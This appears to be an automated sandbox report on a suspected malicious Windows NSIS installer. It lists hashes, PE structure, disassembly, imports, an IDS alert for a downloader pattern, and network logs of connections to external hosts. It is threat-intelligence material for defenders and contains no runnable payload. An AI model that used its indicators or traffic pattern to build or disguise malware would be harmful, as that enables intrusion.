                                                        Category:dropped
                                                        Size (bytes):1835008
                                                        Entropy (8bit):4.295990285181049
                                                        Encrypted:false
                                                        SSDEEP:6144:h41fWRYkg7Di2vXoy00lWZgiWaaKxC44Q0NbuDs+2lmBMZJh1Vjf:W1/YCW2AoQ0Ni4lwMHrVL
                                                        MD5:3CCC3287BCB60DED9FA787DAE0C296B9
                                                        SHA1:71FD298E387E0FC66E19500712EBE9E9442448B7
                                                        SHA-256:6EE500FBFA3047079E0804EE90AC7C0EA37A23DFC5769883F0E98B954B7DC6D2
                                                        SHA-512:1805137C28E7E0E665500880305A8D405449BDDCA30BCDCAD71B1060BD30A99E9A2BCBB357C6ACC89B1575965CDBC5BF25236B426F0D3BF0910148B0C6F691E7
                                                        Malicious:false
                                                        Preview:regfG...G....\.Z.................... ....`......\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtmB.@.c..............................................................................................................................................................................................................................................................................................................................................Y.T.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                        File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                        Entropy (8bit):7.958154658093199
                                                        TrID:
                                                        • Win32 Executable (generic) a (10002005/4) 99.96%
                                                        • Generic Win/DOS Executable (2004/3) 0.02%
                                                        • DOS Executable Generic (2002/1) 0.02%
                                                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                        File name:4AMVusDMPP.exe
                                                        File size:997'399 bytes
                                                        MD5:ed6f1c14e085e4fbc7c47f894f2140b9
                                                        SHA1:1757c800b765345d51a261e11ebe1d89f05c4865
                                                        SHA256:815d6b508fab5d16a8190a479fb4b72a3916d9afe21393eeb506098cb1a93c3a
                                                        SHA512:2b4e7c8669272fd353516d9ba3931536106d480fa11731b445715830098f3f74884f661702bdf25e3d50d1424920f08e1743b2ff4ca65291f3a8f3f98c7fe385
                                                        SSDEEP:24576:9jwKCNd9QdnQK3gxR4Fm9/brSz8pCKDzJyhb1hy5xVgQ7O:V1CqnQc6YKPJyhbzyziV
                                                        TLSH:0025230BF5C3EDAFC5A7C83598B65A97E8BBAD032480D143B374361E5C752E18826793
                                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1...Pf..Pf..Pf.*_9..Pf..Pg.LPf.*_;..Pf..sV..Pf..V`..Pf.Rich.Pf.........................PE..L...$..\.................f...*.....
                                                        Icon Hash:46224e4c19391d03
                                                        Entrypoint:0x4034a5
                                                        Entrypoint Section:.text
                                                        Digitally signed:false
                                                        Imagebase:0x400000
                                                        Subsystem:windows gui
                                                        Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                        DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                        Time Stamp:0x5C157F24 [Sat Dec 15 22:24:36 2018 UTC]
                                                        TLS Callbacks:
                                                        CLR (.Net) Version:
                                                        OS Version Major:4
                                                        OS Version Minor:0
                                                        File Version Major:4
                                                        File Version Minor:0
                                                        Subsystem Version Major:4
                                                        Subsystem Version Minor:0
                                                        Import Hash:1f23f452093b5c1ff091a2f9fb4fa3e9
                                                        Instruction
                                                        sub esp, 000002D4h
                                                        push ebx
                                                        push esi
                                                        push edi
                                                        push 00000020h
                                                        pop edi
                                                        xor ebx, ebx
                                                        push 00008001h
                                                        mov dword ptr [esp+14h], ebx
                                                        mov dword ptr [esp+10h], 0040A230h
                                                        mov dword ptr [esp+1Ch], ebx
                                                        call dword ptr [004080ACh]
                                                        call dword ptr [004080A8h]
                                                        and eax, BFFFFFFFh
                                                        cmp ax, 00000006h
                                                        mov dword ptr [0042A24Ch], eax
                                                        je 00007F2D888139E3h
                                                        push ebx
                                                        call 00007F2D88816CADh
                                                        cmp eax, ebx
                                                        je 00007F2D888139D9h
                                                        push 00000C00h
                                                        call eax
                                                        mov esi, 004082B0h
                                                        push esi
                                                        call 00007F2D88816C27h
                                                        push esi
                                                        call dword ptr [00408150h]
                                                        lea esi, dword ptr [esi+eax+01h]
                                                        cmp byte ptr [esi], 00000000h
                                                        jne 00007F2D888139BCh
                                                        push 0000000Ah
                                                        call 00007F2D88816C80h
                                                        push 00000008h
                                                        call 00007F2D88816C79h
                                                        push 00000006h
                                                        mov dword ptr [0042A244h], eax
                                                        call 00007F2D88816C6Dh
                                                        cmp eax, ebx
                                                        je 00007F2D888139E1h
                                                        push 0000001Eh
                                                        call eax
                                                        test eax, eax
                                                        je 00007F2D888139D9h
                                                        or byte ptr [0042A24Fh], 00000040h
                                                        push ebp
                                                        call dword ptr [00408044h]
                                                        push ebx
                                                        call dword ptr [004082A0h]
                                                        mov dword ptr [0042A318h], eax
                                                        push ebx
                                                        lea eax, dword ptr [esp+34h]
                                                        push 000002B4h
                                                        push eax
                                                        push ebx
                                                        push 004216E8h
                                                        call dword ptr [00408188h]
                                                        push 0040A384h
                                                        Programming Language:
                                                        • [EXP] VC++ 6.0 SP5 build 8804
                                                        NameVirtual AddressVirtual Size Is in Section
                                                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_IMPORT0x85040xa0.rdata
                                                        IMAGE_DIRECTORY_ENTRY_RESOURCE0x550000x21068.rsrc
                                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_IAT0x80000x2b0.rdata
                                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                        NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                        .text0x10000x64090x6600bfe2b726d49cbd922b87bad5eea65e61False0.6540287990196079data6.416186322230332IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                        .rdata0x80000x13960x1400d45dcba8ca646543f7e339e20089687eFalse0.45234375data5.154907432640367IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                        .data0xa0000x203580x6008575fc5e872ca789611c386779287649False0.5026041666666666data4.004402321344153IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                        .ndata0x2b0000x2a0000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                        .rsrc0x550000x210680x2120003ed2ed76ba15352dac9e48819696134False0.8714696344339623data7.556190648348207IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                        NameRVASizeTypeLanguageCountryZLIB Complexity
                                                        RT_BITMAP0x554c00x368Device independent bitmap graphic, 96 x 16 x 4, image size 768EnglishUnited States0.23623853211009174
                                                        RT_ICON0x558280xc2a3PNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishUnited States0.9966684729162903
                                                        RT_ICON0x61ad00x86e0PNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishUnited States0.990210843373494
                                                        RT_ICON0x6a1b00x5085PNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishUnited States0.9867559307233299
                                                        RT_ICON0x6f2380x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600EnglishUnited States0.4358921161825726
                                                        RT_ICON0x717e00x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224EnglishUnited States0.4896810506566604
                                                        RT_ICON0x728880xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colorsEnglishUnited States0.5367803837953091
                                                        RT_ICON0x737300x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colorsEnglishUnited States0.6913357400722022
                                                        RT_ICON0x73fd80x668Device independent bitmap graphic, 48 x 96 x 4, image size 1152EnglishUnited States0.38597560975609757
                                                        RT_ICON0x746400x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colorsEnglishUnited States0.4934971098265896
                                                        RT_ICON0x74ba80x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088EnglishUnited States0.651595744680851
                                                        RT_ICON0x750100x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 512EnglishUnited States0.46908602150537637
                                                        RT_ICON0x752f80x128Device independent bitmap graphic, 16 x 32 x 4, image size 128EnglishUnited States0.5472972972972973
                                                        RT_DIALOG0x754200x120dataEnglishUnited States0.53125
                                                        RT_DIALOG0x755400x118dataEnglishUnited States0.5678571428571428
                                                        RT_DIALOG0x756580x120dataEnglishUnited States0.5104166666666666
                                                        RT_DIALOG0x757780xf8dataEnglishUnited States0.6330645161290323
                                                        RT_DIALOG0x758700xa0dataEnglishUnited States0.6125
                                                        RT_DIALOG0x759100x60dataEnglishUnited States0.7291666666666666
                                                        RT_GROUP_ICON0x759700xaedataEnglishUnited States0.6091954022988506
                                                        RT_VERSION0x75a200x308dataEnglishUnited States0.47036082474226804
                                                        RT_MANIFEST0x75d280x33eXML 1.0 document, ASCII text, with very long lines (830), with no line terminatorsEnglishUnited States0.5542168674698795
                                                        DLLImport
                                                        KERNEL32.dllExitProcess, SetFileAttributesW, Sleep, GetTickCount, CreateFileW, GetFileSize, GetModuleFileNameW, GetCurrentProcess, SetCurrentDirectoryW, GetFileAttributesW, SetEnvironmentVariableW, GetWindowsDirectoryW, GetTempPathW, GetCommandLineW, GetVersion, SetErrorMode, lstrlenW, lstrcpynW, CopyFileW, GetShortPathNameW, GlobalLock, CreateThread, GetLastError, CreateDirectoryW, CreateProcessW, RemoveDirectoryW, lstrcmpiA, GetTempFileNameW, WriteFile, lstrcpyA, MoveFileExW, lstrcatW, GetSystemDirectoryW, GetProcAddress, GetModuleHandleA, GetExitCodeProcess, WaitForSingleObject, lstrcmpiW, MoveFileW, GetFullPathNameW, SetFileTime, SearchPathW, CompareFileTime, lstrcmpW, CloseHandle, ExpandEnvironmentStringsW, GlobalFree, GlobalUnlock, GetDiskFreeSpaceW, GlobalAlloc, FindFirstFileW, FindNextFileW, DeleteFileW, SetFilePointer, ReadFile, FindClose, lstrlenA, MulDiv, MultiByteToWideChar, WideCharToMultiByte, GetPrivateProfileStringW, WritePrivateProfileStringW, FreeLibrary, LoadLibraryExW, GetModuleHandleW
                                                        USER32.dllGetSystemMenu, SetClassLongW, EnableMenuItem, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongW, SetCursor, LoadCursorW, CheckDlgButton, GetMessagePos, LoadBitmapW, CallWindowProcW, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, OpenClipboard, ScreenToClient, GetWindowRect, GetDlgItem, GetSystemMetrics, SetDlgItemTextW, GetDlgItemTextW, MessageBoxIndirectW, CharPrevW, CharNextA, wsprintfA, DispatchMessageW, PeekMessageW, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, DrawTextW, EndDialog, RegisterClassW, SystemParametersInfoW, CreateWindowExW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, GetDC, SetTimer, SetWindowTextW, LoadImageW, SetForegroundWindow, ShowWindow, IsWindow, SetWindowLongW, FindWindowExW, TrackPopupMenu, AppendMenuW, CreatePopupMenu, EndPaint, CreateDialogParamW, SendMessageTimeoutW, wsprintfW, PostQuitMessage
                                                        GDI32.dllSelectObject, SetBkMode, CreateFontIndirectW, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor
                                                        SHELL32.dllSHGetSpecialFolderLocation, ShellExecuteExW, SHGetPathFromIDListW, SHBrowseForFolderW, SHGetFileInfoW, SHFileOperationW
                                                        ADVAPI32.dllAdjustTokenPrivileges, RegCreateKeyExW, RegOpenKeyExW, SetFileSecurityW, OpenProcessToken, LookupPrivilegeValueW, RegEnumValueW, RegDeleteKeyW, RegDeleteValueW, RegCloseKey, RegSetValueExW, RegQueryValueExW, RegEnumKeyW
                                                        COMCTL32.dllImageList_Create, ImageList_AddMasked, ImageList_Destroy
                                                        ole32.dllOleUninitialize, OleInitialize, CoTaskMemFree, CoCreateInstance
                                                        Language of compilation systemCountry where language is spokenMap
                                                        EnglishUnited States
                                                        TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                        2025-01-11T01:15:33.617639+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.1049708142.250.181.238443TCP
                                                        TimestampSource PortDest PortSource IPDest IP
                                                        Jan 11, 2025 01:15:32.467848063 CET49708443192.168.2.10142.250.181.238
                                                        Jan 11, 2025 01:15:32.467906952 CET44349708142.250.181.238192.168.2.10
                                                        Jan 11, 2025 01:15:32.468131065 CET49708443192.168.2.10142.250.181.238
                                                        Jan 11, 2025 01:15:32.556783915 CET49708443192.168.2.10142.250.181.238
                                                        Jan 11, 2025 01:15:32.556798935 CET44349708142.250.181.238192.168.2.10
                                                        Jan 11, 2025 01:15:33.200089931 CET44349708142.250.181.238192.168.2.10
                                                        Jan 11, 2025 01:15:33.200159073 CET49708443192.168.2.10142.250.181.238
                                                        Jan 11, 2025 01:15:33.201005936 CET44349708142.250.181.238192.168.2.10
                                                        Jan 11, 2025 01:15:33.201060057 CET49708443192.168.2.10142.250.181.238
                                                        Jan 11, 2025 01:15:33.309113979 CET49708443192.168.2.10142.250.181.238
                                                        Jan 11, 2025 01:15:33.309132099 CET44349708142.250.181.238192.168.2.10
                                                        Jan 11, 2025 01:15:33.309603930 CET44349708142.250.181.238192.168.2.10
                                                        Jan 11, 2025 01:15:33.309652090 CET49708443192.168.2.10142.250.181.238
                                                        Jan 11, 2025 01:15:33.314172983 CET49708443192.168.2.10142.250.181.238
                                                        Jan 11, 2025 01:15:33.355326891 CET44349708142.250.181.238192.168.2.10
                                                        Jan 11, 2025 01:15:33.617616892 CET44349708142.250.181.238192.168.2.10
                                                        Jan 11, 2025 01:15:33.617671013 CET49708443192.168.2.10142.250.181.238
                                                        Jan 11, 2025 01:15:33.617679119 CET44349708142.250.181.238192.168.2.10
                                                        Jan 11, 2025 01:15:33.617832899 CET49708443192.168.2.10142.250.181.238
                                                        Jan 11, 2025 01:15:33.617968082 CET49708443192.168.2.10142.250.181.238
                                                        Jan 11, 2025 01:15:33.617997885 CET44349708142.250.181.238192.168.2.10
                                                        Jan 11, 2025 01:15:33.618068933 CET49708443192.168.2.10142.250.181.238
                                                        Jan 11, 2025 01:15:33.648571968 CET49709443192.168.2.10172.217.16.193
                                                        Jan 11, 2025 01:15:33.648607016 CET44349709172.217.16.193192.168.2.10
                                                        Jan 11, 2025 01:15:33.648688078 CET49709443192.168.2.10172.217.16.193
                                                        Jan 11, 2025 01:15:33.649111986 CET49709443192.168.2.10172.217.16.193
                                                        Jan 11, 2025 01:15:33.649135113 CET44349709172.217.16.193192.168.2.10
                                                        Jan 11, 2025 01:15:34.294859886 CET44349709172.217.16.193192.168.2.10
                                                        Jan 11, 2025 01:15:34.294981003 CET49709443192.168.2.10172.217.16.193
                                                        Jan 11, 2025 01:15:34.300157070 CET49709443192.168.2.10172.217.16.193
                                                        Jan 11, 2025 01:15:34.300194025 CET44349709172.217.16.193192.168.2.10
                                                        Jan 11, 2025 01:15:34.300507069 CET44349709172.217.16.193192.168.2.10
                                                        Jan 11, 2025 01:15:34.300591946 CET49709443192.168.2.10172.217.16.193
                                                        Jan 11, 2025 01:15:34.369452000 CET49709443192.168.2.10172.217.16.193
                                                        Jan 11, 2025 01:15:34.415335894 CET44349709172.217.16.193192.168.2.10
                                                        Jan 11, 2025 01:15:36.871890068 CET44349709172.217.16.193192.168.2.10
                                                        Jan 11, 2025 01:15:36.872066975 CET49709443192.168.2.10172.217.16.193
                                                        Jan 11, 2025 01:15:36.877708912 CET44349709172.217.16.193192.168.2.10
                                                        Jan 11, 2025 01:15:36.877882957 CET49709443192.168.2.10172.217.16.193
                                                        Jan 11, 2025 01:15:36.890187979 CET44349709172.217.16.193192.168.2.10
                                                        Jan 11, 2025 01:15:36.890436888 CET49709443192.168.2.10172.217.16.193
                                                        Jan 11, 2025 01:15:36.890450001 CET44349709172.217.16.193192.168.2.10
                                                        Jan 11, 2025 01:15:36.890547991 CET49709443192.168.2.10172.217.16.193
                                                        Jan 11, 2025 01:15:36.896512032 CET44349709172.217.16.193192.168.2.10
                                                        Jan 11, 2025 01:15:36.896588087 CET49709443192.168.2.10172.217.16.193
                                                        Jan 11, 2025 01:15:36.960163116 CET44349709172.217.16.193192.168.2.10
                                                        Jan 11, 2025 01:15:36.960221052 CET44349709172.217.16.193192.168.2.10
                                                        Jan 11, 2025 01:15:36.960302114 CET49709443192.168.2.10172.217.16.193
                                                        Jan 11, 2025 01:15:36.960314989 CET44349709172.217.16.193192.168.2.10
                                                        Jan 11, 2025 01:15:36.960380077 CET49709443192.168.2.10172.217.16.193
                                                        Jan 11, 2025 01:15:36.960380077 CET49709443192.168.2.10172.217.16.193
                                                        Jan 11, 2025 01:15:36.961471081 CET44349709172.217.16.193192.168.2.10
                                                        Jan 11, 2025 01:15:36.961993933 CET49709443192.168.2.10172.217.16.193
                                                        Jan 11, 2025 01:15:36.961999893 CET44349709172.217.16.193192.168.2.10
                                                        Jan 11, 2025 01:15:36.963160038 CET49709443192.168.2.10172.217.16.193
                                                        Jan 11, 2025 01:15:36.975481033 CET44349709172.217.16.193192.168.2.10
                                                        Jan 11, 2025 01:15:36.975593090 CET44349709172.217.16.193192.168.2.10
                                                        Jan 11, 2025 01:15:36.975610018 CET49709443192.168.2.10172.217.16.193
                                                        Jan 11, 2025 01:15:36.975620985 CET44349709172.217.16.193192.168.2.10
                                                        Jan 11, 2025 01:15:36.975646973 CET49709443192.168.2.10172.217.16.193
                                                        Jan 11, 2025 01:15:36.975744009 CET49709443192.168.2.10172.217.16.193
                                                        Jan 11, 2025 01:15:36.975749016 CET44349709172.217.16.193192.168.2.10
                                                        Jan 11, 2025 01:15:36.975856066 CET49709443192.168.2.10172.217.16.193
                                                        Jan 11, 2025 01:15:36.979990005 CET44349709172.217.16.193192.168.2.10
                                                        Jan 11, 2025 01:15:36.980068922 CET49709443192.168.2.10172.217.16.193
                                                        Jan 11, 2025 01:15:36.980077028 CET44349709172.217.16.193192.168.2.10
                                                        Jan 11, 2025 01:15:36.980149984 CET49709443192.168.2.10172.217.16.193
                                                        Jan 11, 2025 01:15:36.986210108 CET44349709172.217.16.193192.168.2.10
                                                        Jan 11, 2025 01:15:36.986346006 CET49709443192.168.2.10172.217.16.193
                                                        Jan 11, 2025 01:15:36.986355066 CET44349709172.217.16.193192.168.2.10
                                                        Jan 11, 2025 01:15:36.986455917 CET49709443192.168.2.10172.217.16.193
                                                        Jan 11, 2025 01:15:36.992605925 CET44349709172.217.16.193192.168.2.10
                                                        Jan 11, 2025 01:15:36.993123055 CET49709443192.168.2.10172.217.16.193
                                                        Jan 11, 2025 01:15:36.993133068 CET44349709172.217.16.193192.168.2.10
                                                        Jan 11, 2025 01:15:36.993216038 CET49709443192.168.2.10172.217.16.193
                                                        Jan 11, 2025 01:15:36.998856068 CET44349709172.217.16.193192.168.2.10
                                                        Jan 11, 2025 01:15:36.999038935 CET49709443192.168.2.10172.217.16.193
                                                        Jan 11, 2025 01:15:36.999047041 CET44349709172.217.16.193192.168.2.10
                                                        Jan 11, 2025 01:15:36.999126911 CET49709443192.168.2.10172.217.16.193
                                                        Jan 11, 2025 01:15:37.005641937 CET44349709172.217.16.193192.168.2.10
                                                        Jan 11, 2025 01:15:37.006400108 CET49709443192.168.2.10172.217.16.193
                                                        Jan 11, 2025 01:15:37.006411076 CET44349709172.217.16.193192.168.2.10
                                                        Jan 11, 2025 01:15:37.006486893 CET49709443192.168.2.10172.217.16.193
                                                        Jan 11, 2025 01:15:37.010459900 CET44349709172.217.16.193192.168.2.10
                                                        Jan 11, 2025 01:15:37.010801077 CET49709443192.168.2.10172.217.16.193
                                                        Jan 11, 2025 01:15:37.010812998 CET44349709172.217.16.193192.168.2.10
                                                        Jan 11, 2025 01:15:37.010893106 CET49709443192.168.2.10172.217.16.193
                                                        Jan 11, 2025 01:15:37.016216993 CET44349709172.217.16.193192.168.2.10
                                                        Jan 11, 2025 01:15:37.016341925 CET49709443192.168.2.10172.217.16.193
                                                        Jan 11, 2025 01:15:37.016350985 CET44349709172.217.16.193192.168.2.10
                                                        Jan 11, 2025 01:15:37.016407013 CET49709443192.168.2.10172.217.16.193
                                                        Jan 11, 2025 01:15:37.032540083 CET44349709172.217.16.193192.168.2.10
                                                        Jan 11, 2025 01:15:37.032598019 CET44349709172.217.16.193192.168.2.10
                                                        Jan 11, 2025 01:15:37.032810926 CET49709443192.168.2.10172.217.16.193
                                                        Jan 11, 2025 01:15:37.032810926 CET49709443192.168.2.10172.217.16.193
                                                        Jan 11, 2025 01:15:37.032820940 CET44349709172.217.16.193192.168.2.10
                                                        Jan 11, 2025 01:15:37.033179045 CET49709443192.168.2.10172.217.16.193
                                                        Jan 11, 2025 01:15:37.050556898 CET44349709172.217.16.193192.168.2.10
                                                        Jan 11, 2025 01:15:37.050628901 CET44349709172.217.16.193192.168.2.10
                                                        Jan 11, 2025 01:15:37.050646067 CET49709443192.168.2.10172.217.16.193
                                                        Jan 11, 2025 01:15:37.050656080 CET44349709172.217.16.193192.168.2.10
                                                        Jan 11, 2025 01:15:37.050672054 CET49709443192.168.2.10172.217.16.193
                                                        Jan 11, 2025 01:15:37.050925016 CET49709443192.168.2.10172.217.16.193
                                                        Jan 11, 2025 01:15:37.050931931 CET44349709172.217.16.193192.168.2.10
                                                        Jan 11, 2025 01:15:37.050982952 CET44349709172.217.16.193192.168.2.10
                                                        Jan 11, 2025 01:15:37.050996065 CET49709443192.168.2.10172.217.16.193
                                                        Jan 11, 2025 01:15:37.051003933 CET44349709172.217.16.193192.168.2.10
                                                        Jan 11, 2025 01:15:37.051337957 CET49709443192.168.2.10172.217.16.193
                                                        Jan 11, 2025 01:15:37.051337957 CET49709443192.168.2.10172.217.16.193
                                                        Jan 11, 2025 01:15:37.051347017 CET44349709172.217.16.193192.168.2.10
                                                        Jan 11, 2025 01:15:37.051609039 CET49709443192.168.2.10172.217.16.193
                                                        Jan 11, 2025 01:15:37.054434061 CET44349709172.217.16.193192.168.2.10
                                                        Jan 11, 2025 01:15:37.054502010 CET44349709172.217.16.193192.168.2.10
                                                        Jan 11, 2025 01:15:37.054511070 CET49709443192.168.2.10172.217.16.193
                                                        Jan 11, 2025 01:15:37.054517984 CET44349709172.217.16.193192.168.2.10
                                                        Jan 11, 2025 01:15:37.054549932 CET49709443192.168.2.10172.217.16.193
                                                        Jan 11, 2025 01:15:37.054718971 CET49709443192.168.2.10172.217.16.193
                                                        Jan 11, 2025 01:15:37.060584068 CET44349709172.217.16.193192.168.2.10
                                                        Jan 11, 2025 01:15:37.060674906 CET49709443192.168.2.10172.217.16.193
                                                        Jan 11, 2025 01:15:37.060682058 CET44349709172.217.16.193192.168.2.10
                                                        Jan 11, 2025 01:15:37.060925007 CET49709443192.168.2.10172.217.16.193
                                                        Jan 11, 2025 01:15:37.065463066 CET44349709172.217.16.193192.168.2.10
                                                        Jan 11, 2025 01:15:37.065712929 CET49709443192.168.2.10172.217.16.193
                                                        Jan 11, 2025 01:15:37.065721035 CET44349709172.217.16.193192.168.2.10
                                                        Jan 11, 2025 01:15:37.066783905 CET49709443192.168.2.10172.217.16.193
                                                        Jan 11, 2025 01:15:37.070652962 CET44349709172.217.16.193192.168.2.10
                                                        Jan 11, 2025 01:15:37.070712090 CET49709443192.168.2.10172.217.16.193
                                                        Jan 11, 2025 01:15:37.070719957 CET44349709172.217.16.193192.168.2.10
                                                        Jan 11, 2025 01:15:37.070768118 CET49709443192.168.2.10172.217.16.193
                                                        Jan 11, 2025 01:15:37.074042082 CET44349709172.217.16.193192.168.2.10
                                                        Jan 11, 2025 01:15:37.074255943 CET49709443192.168.2.10172.217.16.193
                                                        Jan 11, 2025 01:15:37.074263096 CET44349709172.217.16.193192.168.2.10
                                                        Jan 11, 2025 01:15:37.075320959 CET49709443192.168.2.10172.217.16.193
                                                        Jan 11, 2025 01:15:37.078949928 CET44349709172.217.16.193192.168.2.10
                                                        Jan 11, 2025 01:15:37.079008102 CET49709443192.168.2.10172.217.16.193
                                                        Jan 11, 2025 01:15:37.079015017 CET44349709172.217.16.193192.168.2.10
                                                        Jan 11, 2025 01:15:37.079061985 CET49709443192.168.2.10172.217.16.193
                                                        Jan 11, 2025 01:15:37.087824106 CET44349709172.217.16.193192.168.2.10
                                                        Jan 11, 2025 01:15:37.088015079 CET44349709172.217.16.193192.168.2.10
                                                        Jan 11, 2025 01:15:37.088032007 CET49709443192.168.2.10172.217.16.193
                                                        Jan 11, 2025 01:15:37.088044882 CET44349709172.217.16.193192.168.2.10
                                                        Jan 11, 2025 01:15:37.088057041 CET44349709172.217.16.193192.168.2.10
                                                        Jan 11, 2025 01:15:37.088092089 CET49709443192.168.2.10172.217.16.193
                                                        Jan 11, 2025 01:15:37.088109970 CET49709443192.168.2.10172.217.16.193
                                                        Jan 11, 2025 01:15:37.092675924 CET44349709172.217.16.193192.168.2.10
                                                        Jan 11, 2025 01:15:37.092725039 CET49709443192.168.2.10172.217.16.193
                                                        Jan 11, 2025 01:15:37.092732906 CET44349709172.217.16.193192.168.2.10
                                                        Jan 11, 2025 01:15:37.092957020 CET49709443192.168.2.10172.217.16.193
                                                        Jan 11, 2025 01:15:37.097564936 CET44349709172.217.16.193192.168.2.10
                                                        Jan 11, 2025 01:15:37.097631931 CET49709443192.168.2.10172.217.16.193
                                                        Jan 11, 2025 01:15:37.097645998 CET44349709172.217.16.193192.168.2.10
                                                        Jan 11, 2025 01:15:37.097728014 CET49709443192.168.2.10172.217.16.193
                                                        Jan 11, 2025 01:15:37.102333069 CET44349709172.217.16.193192.168.2.10
                                                        Jan 11, 2025 01:15:37.103333950 CET49709443192.168.2.10172.217.16.193
                                                        Jan 11, 2025 01:15:37.103341103 CET44349709172.217.16.193192.168.2.10
                                                        Jan 11, 2025 01:15:37.104690075 CET49709443192.168.2.10172.217.16.193
                                                        Jan 11, 2025 01:15:37.106204033 CET44349709172.217.16.193192.168.2.10
                                                        Jan 11, 2025 01:15:37.106260061 CET49709443192.168.2.10172.217.16.193
                                                        Jan 11, 2025 01:15:37.106395960 CET44349709172.217.16.193192.168.2.10
                                                        Jan 11, 2025 01:15:37.106820107 CET49709443192.168.2.10172.217.16.193
                                                        Jan 11, 2025 01:15:37.110456944 CET44349709172.217.16.193192.168.2.10
                                                        Jan 11, 2025 01:15:37.110511065 CET44349709172.217.16.193192.168.2.10
                                                        Jan 11, 2025 01:15:37.110538960 CET49709443192.168.2.10172.217.16.193
                                                        Jan 11, 2025 01:15:37.110546112 CET44349709172.217.16.193192.168.2.10
                                                        Jan 11, 2025 01:15:37.110583067 CET49709443192.168.2.10172.217.16.193
                                                        Jan 11, 2025 01:15:37.110601902 CET49709443192.168.2.10172.217.16.193
                                                        Jan 11, 2025 01:15:37.110639095 CET49709443192.168.2.10172.217.16.193
                                                        Jan 11, 2025 01:15:37.110687971 CET44349709172.217.16.193192.168.2.10
                                                        Jan 11, 2025 01:15:37.110760927 CET44349709172.217.16.193192.168.2.10
                                                        Jan 11, 2025 01:15:37.110780001 CET49709443192.168.2.10172.217.16.193
                                                        Jan 11, 2025 01:15:37.110816956 CET49709443192.168.2.10172.217.16.193
                                                        Jan 11, 2025 01:15:37.728749037 CET4971080192.168.2.10193.122.130.0
                                                        Jan 11, 2025 01:15:37.733691931 CET8049710193.122.130.0192.168.2.10
                                                        Jan 11, 2025 01:15:37.734148026 CET4971080192.168.2.10193.122.130.0
                                                        Jan 11, 2025 01:15:37.734148026 CET4971080192.168.2.10193.122.130.0
                                                        Jan 11, 2025 01:15:37.739130974 CET8049710193.122.130.0192.168.2.10
                                                        Jan 11, 2025 01:15:41.206324100 CET8049710193.122.130.0192.168.2.10
                                                        Jan 11, 2025 01:15:41.255081892 CET4971080192.168.2.10193.122.130.0
                                                        Jan 11, 2025 01:16:04.824492931 CET4971080192.168.2.10193.122.130.0
                                                        TimestampSource PortDest PortSource IPDest IP
                                                        Jan 11, 2025 01:15:32.456149101 CET6116153192.168.2.101.1.1.1
                                                        Jan 11, 2025 01:15:32.463021040 CET53611611.1.1.1192.168.2.10
                                                        Jan 11, 2025 01:15:33.639823914 CET5205053192.168.2.101.1.1.1
                                                        Jan 11, 2025 01:15:33.647726059 CET53520501.1.1.1192.168.2.10
                                                        Jan 11, 2025 01:15:37.717549086 CET5296153192.168.2.101.1.1.1
                                                        Jan 11, 2025 01:15:37.724399090 CET53529611.1.1.1192.168.2.10
                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
